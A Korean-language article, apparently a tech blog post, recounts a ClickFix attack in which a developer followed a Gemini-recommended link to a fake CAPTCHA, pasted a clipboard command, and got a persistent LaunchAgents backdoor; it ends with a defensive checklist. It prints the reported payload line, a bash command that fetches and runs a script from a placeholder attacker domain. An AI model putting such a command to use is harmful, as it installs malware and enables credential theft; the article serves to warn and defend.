AI 추천 클릭 한번에 털렸다

AI에게 검색을 맡기는 시대다. 제미나이, ChatGPT, 퍼플렉시티가 골라준 링크라면 사용자는 한 번 더 의심하기보다 그냥 클릭한다. 그 신뢰의 틈을 정확히 노린 사회공학 공격이 한국 개발자에게 실제로 적중했다. 5월 6일 공개된 사건 기록을 따라가 보면, AI 추천이라는 새로운 트래픽 경로가 보안 측면에서 어떤 빈틈을 만들어냈는지 그 윤곽이 분명히 드러난다.

발단: ‘AI 추천 + 가짜 캡차’ 콤보

새벽 1시 반의 클릭

사건은 평범한 야근 중에 시작됐다. 개발자 mytory가 제미나이와 대화하며 추천받은 사이트로 이동했더니, “당신이 로봇이 아님을 증명해 주세요”라는 캡차 화면이 떠 있었다. 단계는 단 세 줄이었다. 키보드의 윈도우 키와 R을 같이 누르고, 실행 창에서 Ctrl+V로 붙여넣은 뒤, 엔터를 친다. AI가 추천한 링크라는 신뢰가 의심을 무너뜨렸고, 그는 시키는 대로 했다.

화면에는 검증 ID와 reCAPTCHA 로고가 박혀 있었지만, 그 순간 클립보드에는 이미 공격용 명령이 들어와 있었다. 사용자는 단지 자신이 복사한 적도 없는 명령을 시스템에 입력해 줬을 뿐이다. 캡차 화면은 가짜였고, 검증을 통과한 척하던 그 사이트는 그 즉시 폐쇄됐다.

왜 통하나: ClickFix의 작동 원리

사용자가 직접 자기 PC를 감염시키게 만든다

ClickFix는 최근 빠르게 확산 중인 사회공학 기법이다. 핵심은 단순하다. 캡차나 시스템 오류 메시지로 위장한 화면이 사용자에게 “검증을 위해 이 명령을 실행하라”고 안내하고, 사용자가 클릭하는 순간 자바스크립트가 클립보드에 악성 페이로드를 자동 복사한다. 그다음 사용자는 자기 손으로 그 명령을 실행 창이나 터미널에 붙여넣는다. 백신은 외부 다운로드가 아니라 사용자가 입력한 명령으로 본 공격이라서 1차 차단 지점이 없다.

맥에서는 다음과 같은 구조의 명령이 클립보드에 들어왔다고 보고됐다. /bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL [공격자도메인])" 단 한 줄이다. curl이 외부 스크립트를 받아오고, bash가 그것을 즉시 실행한다. 윈도우에서는 rundll32.exe와 UNC 경로를 조합해 디스크에 파일을 떨어뜨리지 않고 메모리에서 바로 DLL을 로드하는 파일리스(Fileless) 변형이 관측됐다. 탐지 난이도가 한 단계 더 높아진 셈이다.

진짜 무기: LaunchAgents로 만드는 영구 백도어

로그아웃·재부팅에도 살아남는 plist

한 줄짜리 curl 실행이 끝난 직후, 피해자의 맥에는 어색한 비밀번호 입력 창이 떴다. 닫아도 다시 가운데로 기어나오고, 로그아웃·재로그인 후에도 그대로 떠 있었다. 재부팅을 해도 결과는 같았다. 새벽 1시 반, 피곤한 상태였던 사용자는 이 시점에서야 비로소 무언가 잘못됐음을 직감했다.

원인은 ~/Library/LaunchAgents/ 폴더에 새로 만들어진 plist 파일이었다. 윈도우의 서비스 자동 시작과 같은 기능을 하는 이 파일이 부팅 시마다 base64로 인코딩된 osascript 명령을 돌려, 공격자 서버에 주기적으로 접속하고 추가 페이로드를 받아 실행하는 구조였다. 즉 한 번의 클립보드 붙여넣기로 사용자는 본인 컴퓨터에 영구적인 원격 제어 통로를 깔아준 셈이다.

15분간 일어난 일: 무엇이 털리고 무엇이 살았나

맥 시스템 비번을 안 친 것이 결정적이었다

시스템 로그 분석에 따르면 1시 57분부터 2시 12분까지 약 15분간 공격이 활발했다. 맥의 SIP 보호 기능과 OSAX 우회 시도는 차단됐지만, 일반 사용자 권한으로 접근 가능한 영역은 상당 부분 노출 정황이 잡혔다. 브라우저 세션 쿠키, SSH 키, 클립보드의 실시간 텍스트, CoreSpotlight 인덱스를 통한 민감 파일명 탐색 흔적이 남았다.

반면 피해자는 가짜 비밀번호 창에 맥 시스템 비번을 끝까지 입력하지 않았고, 파이어폭스에는 마스터 비밀번호가 걸려 있었다. 만약 시스템 비번이 들어갔다면 키체인의 모든 자격 증명이 통째로 빠져나가고, 키 로거와 스크린 캡처 도구가 심어졌을 가능성이 컸다. 이 한 번의 망설임이 피해 등급을 두 단계 낮춘 결정적 순간이었다.

지금 점검해야 할 5가지 방어선

개발자·일반 사용자 공통 체크리스트

첫째, 어떤 캡차도 키보드 단축키 실행이나 터미널·PowerShell 붙여넣기를 요구하지 않는다는 사실을 머릿속에 박아두자. 한 줄짜리든 백 줄짜리든 동일하다. 둘째, 브라우저에 마스터 비밀번호를 설정해 자동 채움을 잠그자. 쿠키와 별개로 저장된 비밀번호의 일괄 유출을 막는 마지막 방어선이다. 셋째, 맥 사용자라면 LaunchAgents 폴더와 launchctl list 결과를, 윈도우 사용자라면 작업 스케줄러와 Run 레지스트리를 한 달에 한 번이라도 들여다보는 습관을 들이자.

넷째, AI 챗봇이 추천한 링크라도 도메인을 한 번 더 살피고, 처음 보는 도메인에서 캡차나 인증 단계가 끼어들면 즉시 빠져나오자. 다섯째, 이번 사건의 수습 과정에서 핵심이었던 절차는 다음과 같다. 인터넷 차단 → launchctl unload로 등록된 plist 정지 → plist 파일 분석용 백업 후 삭제 → killall osascript로 실행 중 프로세스 정리 → 로그인된 모든 서비스 강제 로그아웃 후 재로그인. 쿠키 무효화 단계를 빼먹으면 이중인증을 켜놨더라도 탈취 쿠키만으로 침입자가 다시 들어올 수 있다.

관련 글

• Claude Opus 4.7, 코딩 87.6%로 1위 탈환
• Claude·Kimi K2.6·Mercedes 테크 다이제스트
• AI 코딩 컨텍스트 98% 절약 MCP·금융 오픈소스 TOP3
• 메타, 휴머노이드 AI 스타트업 ARI 인수

출처

1. mytory — 봇이 아님을 증명하다가 해킹 당한 이야기 (ClickFix 공격)
2. GeekNews — 제미나이가 추천해준 사이트에서 “로봇 아님”을 증명하다가 해킹당함